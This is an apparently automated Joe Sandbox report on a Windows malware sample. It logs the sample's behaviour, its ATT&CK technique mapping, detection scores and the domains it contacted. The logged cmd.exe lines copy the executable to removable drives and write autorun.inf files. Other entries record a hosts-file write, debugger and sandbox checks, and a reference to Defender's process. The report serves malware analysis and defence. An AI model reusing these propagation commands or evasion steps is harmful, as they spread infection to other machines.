Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IPrstVM17M.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: IPrstVM17M.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IPrstVM17M.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IPrstVM17M.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IPrstVM17M.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IPrstVM17M.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Window / User API: threadDelayed 365
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820 | Thread sleep time: -365000s >= -30000s
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820 | Thread sleep time: -347000s >= -30000s
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Last function: Thread delayed
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(C
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_002029B0 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,IsDebuggerPresent,GetModuleFileNameA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,GetEnvironmentVariableA,getenv,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,memcpy,memcpy,memcpy,GetEnvironmentVariableA,memcpy,_invalid_parameter_noinfo_noreturn,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noretu
rn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,S0_2_002029B0
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: 0_2_0020A128 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0020A128
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: 0_2_00209D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_00209D74
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: 0_2_0020A28D SetUnhandledExceptionFilter, | 0_2_0020A28D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\IPrstVM17M.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: 0_2_00209F44 cpuid | 0_2_00209F44
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: 0_2_0020A2FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_0020A2FC

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\IPrstVM17M.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: IPrstVM17M.exe, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
MITRE ATT&CK Matrix (number in parentheses: matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: File and Directory Permissions Modification (1); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Query Registry (1); Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (1); Peripheral Device Discovery (1); Remote System Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Source | Detection | Scanner | Label | Link
IPrstVM17M.exe | 16% | ReversingLabs | |
IPrstVM17M.exe | 14% | Virustotal | | Browse
IPrstVM17M.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\bin.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
grabify.world | 2% | Virustotal | | Browse
stopify.co | 3% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://grabify.$ | 0% | Avira URL Cloud | safe |
http://google.com1 | 0% | Avira URL Cloud | safe |
https://stopify.co/news.php?tid=JBB69H.jpg | 0% | Avira URL Cloud | safe |
https://stopify.co/news.php?tid=JBB69H.jpgm | 0% | Avira URL Cloud | safe |
https://grabify.world/news.php?tid=JBB69H.jpg | 0% | Avira URL Cloud | safe |
https://stopify.co/ | 0% | Avira URL Cloud | safe |
https://stopify.co/news.php?tid=JBB69H.jpg% | 0% | Avira URL Cloud | safe |
https://grabify.world/news.php?tid=JBB69H.jpg: | 0% | Avira URL Cloud | safe |
https://grabify.world/news.php?tid=JBB69H.jpgw | 0% | Avira URL Cloud | safe |
https://stopify.co/news.php?tid=JBB69H.jpg | 2% | Virustotal | | Browse
https://grabify.world/ | 0% | Avira URL Cloud | safe |
https://stopify.co/ | 3% | Virustotal | | Browse
https://grabify.world/news.php?tid=JBB69H.jpg | 1% | Virustotal | | Browse
https://grabify.world/ | 2% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 142.251.2.101 | true | false | | high
grabify.world | 172.67.161.186 | true | false | | unknown
www.google.com | 142.250.141.104 | true | false | | high
grabify.link | 104.26.8.202 | true | false | | high
stopify.co | 52.173.151.229 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://google.com/ | false | | high
https://grabify.world/news.php?tid=JBB69H.jpg | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://stopify.co/news.php?tid=JBB69H.jpg | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://grabify.link/news.php?tid=JBB69H.jpg | false | | high
http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMf | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaV | IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://google.com1 | IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://google.com/7 | IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.google.com/B | IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://grabify.$ | IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://google.com | IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://grabify.link/( | IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://stopify.co/news.php?tid=JBB69H.jpgm | IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stopify.co/ | IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.google.com/. | IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://grabify.link/news.php?tid=JBB69H.jpgw | IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://stopify.co/news.php?tid=JBB69H.jpg% | IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.google.com/ws.php?tid=JBB69H.jpg | IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://grabify.world/news.php?tid=JBB69H.jpg: | IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://grabify.world/news.php?tid=JBB69H.jpgw | IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://grabify.world/ | IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://grabify.link/news.php?tid=JBB69H.jpgH | IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-a | IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://grabify.link/ | IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://grabify.link/F | IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.google.com/ | IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.8.202 | grabify.link | United States | 13335 | CLOUDFLARENETUS | false
172.67.161.186 | grabify.world | United States | 13335 | CLOUDFLARENETUS | false
52.173.151.229 | stopify.co | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.141.104 | www.google.com | United States | 15169 | GOOGLEUS | false
142.251.2.101 | google.com | United States | 15169 | GOOGLEUS | false
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1430905
                                        Start date and time:2024-04-24 10:53:40 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 22s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:IPrstVM17M.exe
                                        (renamed file extension from none to exe, renamed because original name is a hash value)
                                        Original Sample Name:3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
                                        Detection:MAL
                                        Classification:mal64.adwa.evad.winEXE@16/4@5/5
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 14
                                        • Number of non-executed functions: 17
                                        Cookbook Comments:
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
10:55:14 | API Interceptor | 688x Sleep call for process: IPrstVM17M.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.26.8.202 | file.exe | Get hash | malicious | Glupteba, GuLoader, Socks5Systemz, Stealc | Browse |
 | ACEUpF30qq.hta | Get hash | malicious | Unknown | Browse |
 | XqESmKfu19.exe | Get hash | malicious | Unknown | Browse |
 | KiwiX.bin.exe | Get hash | malicious | AsyncRAT | Browse |
 | https://grabify.link/requirments.php? | Get hash | malicious | Unknown | Browse |
172.67.161.186 | JYHtfExdx6.exe | Get hash | malicious | FormBook | Browse | www.installmentloanshq.com/ce0a/?4h=UuZmUqRMH79D5JO2D7nYh8gOqfd7QfKHpeygh9jB8f7tAkZ5ELnxTHHWZi7Zs3Oo8EtT&WJBpR=4hiP82cp3Z4
52.173.151.229 | KiwiX.bin.exe | Get hash | malicious | AsyncRAT | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
